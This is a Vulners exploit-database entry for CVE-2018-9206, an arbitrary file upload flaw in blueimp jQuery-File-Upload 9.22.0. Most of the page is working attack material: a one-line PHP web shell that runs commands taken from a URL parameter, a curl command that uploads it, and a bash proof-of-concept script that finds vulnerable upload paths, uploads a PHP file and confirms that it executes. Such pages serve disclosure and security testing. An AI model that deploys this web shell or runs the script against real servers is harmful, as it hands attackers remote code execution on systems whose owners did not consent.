Vulners
Lucene search
jQuery-File-Upload 9.22.0 - Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 45 |
|---|---|---|---|---|
 | blueimp jQuery Arbitrary File Upload Exploit | 5 Nov 201800:00 | – | zdt |
 | Exploit for Unrestricted Upload of File with Dangerous Type in Jquery_File_Upload_Project Jquery_File_Upload | 27 Dec 202502:31 | – | githubexploit |
 | CVE-2018-9206 | 11 Oct 201800:00 | – | circl |
 | Blueimp jQuery-File-Upload Arbitrary File Upload Vulnerability | 15 Oct 201800:00 | – | cnvd |
 | Blueimp jQuery File Upload Remote Code Execution (CVE-2018-9206) | 1 Nov 201800:00 | – | checkpoint_advisories |
 | CVE-2018-9206 | 11 Oct 201815:00 | – | cve |
 | CVE-2018-9206 | 11 Oct 201815:00 | – | cvelist |
 | CVE-2018-9206 | 11 Oct 201815:00 | – | debiancve |
 | jQuery File Upload | 18 Oct 201800:00 | – | dsquare |
 | blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit) | 6 Nov 201800:00 | – | exploitdb |
10
# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload
# Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A
# Vulnerability:
# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php
# doesn't require any validation to upload files to the server. It also doesn't exclude file types.
# This allows for remote code execution.
# shell.php:
<?php $cmd=$_GET['cmd']; system($cmd);?>
# Exploit Code:
$ curl -F "[email protected]" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
#!/bin/bash
USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php")
MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php"
# What is added in this exploit from the original version
# - a bit of refactoring
# - automatically request the right filename if it already exists on server ex: 'file (1).php'
# - Try to detect plugin version,
# - Try to detect index.html (allowing files upload via gui)
# Checking curl & jq
curl -h &>/dev/null
if [ $? -ne 0 ]; then
echo "[!] Please install curl."
echo "# apt install curl"
exit 1
fi
jq -h &>/dev/null
if [ $? -ne 0 ]; then
echo "[!] Please install jq."
echo "# apt install jq"
exit 1
fi
# Checking url
if [ -z $1 ]; then
echo "[!] Please supply a target host as an argument."
echo "$0 http://www.example.com"
exit 1
fi
# Generating payload
echo "<?php echo \"it works\"; unlink(__FILE__); ?>" > ${MALICIOUS_FILE}
echo "________________________________________________________________________________"
echo "|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206"
echo "|Checks for older versions of the code and upload an harmless file."
echo "|"
echo "| @_larry0, @phackt_ul"
echo "|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)."
echo "---/"
echo
echo "[+] Checking variations :"
# Creating alias
curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"'
index=-1
found=0
# Looking for upload php class file
for x in ${PATHS[@]}; do
echo "[*] Testing... -> $1/$x"
${curl} -i "$1/$x" | head -1 | grep 200 &>/dev/null
if [ $? -eq 0 ]; then
echo "[+] Found Path: $x"
index=$((${index}+1))
found=1
break;
fi;
index=$((${index}+1))
done
# Determining the exploit path according to the jquery version
exploit_path=""
if [ ${index} -eq 0 -o ${index} -eq 2 ];then
exploit_path="server/php/index.php"
fi
if [ ${index} -eq 1 ];then
exploit_path="example/upload.php"
fi
if [ ${index} -eq 3 ];then
exploit_path="php/index.php"
fi
if [ ${found} -ne 1 ]; then
echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!"
exit 1
fi
# Trying to detect bower.json, package.json
version_files=("bower.json package.json")
for x in ${version_files[@]}; do
version=`${curl} "$1/$x" | jq -r .version`
if [ "X" != "X""${version}" ]; then
echo "[!] Found: Plugin version ${version}"
break;
fi
done
# Trying to detect index.html
${curl} "$1/index.html" | grep -i "jquery file upload" &>/dev/null
if [ $? -eq 0 ]; then
echo "[!] Found: $1/index.html is accessible"
fi
# Uploading payload
res=""
echo "[+] Running ${curl} -F \"files[]=@${MALICIOUS_FILE}\" -F \"filename=${MALICIOUS_FILE}\" \"$1/${exploit_path}\""
filename=`${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}" | jq -r .files[].name`
if [ "X""${filename}" == "X" ]; then
echo "[!] It seems that we had a false positive! :("
exit 1
fi
filename=`echo "$filename" | sed 's/ /%20/g'`
# Trying to see if victim has been exploited
echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/${filename}"
res=`${curl} "$1/$(dirname ${exploit_path})/files/${filename}"`
if [ "${res}" == "it works" ]; then
echo "[!] Found: $1 is vulnerable"
else
echo "[+] Seems not vulnerable :("
fi
rm -f "${MALICIOUS_FILE}" &>/dev/nullData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Oct 2018 00:00Current
9.3High risk
Vulners AI Score9.3
CVSS 27.5
CVSS 3.19.8
EPSS0.93778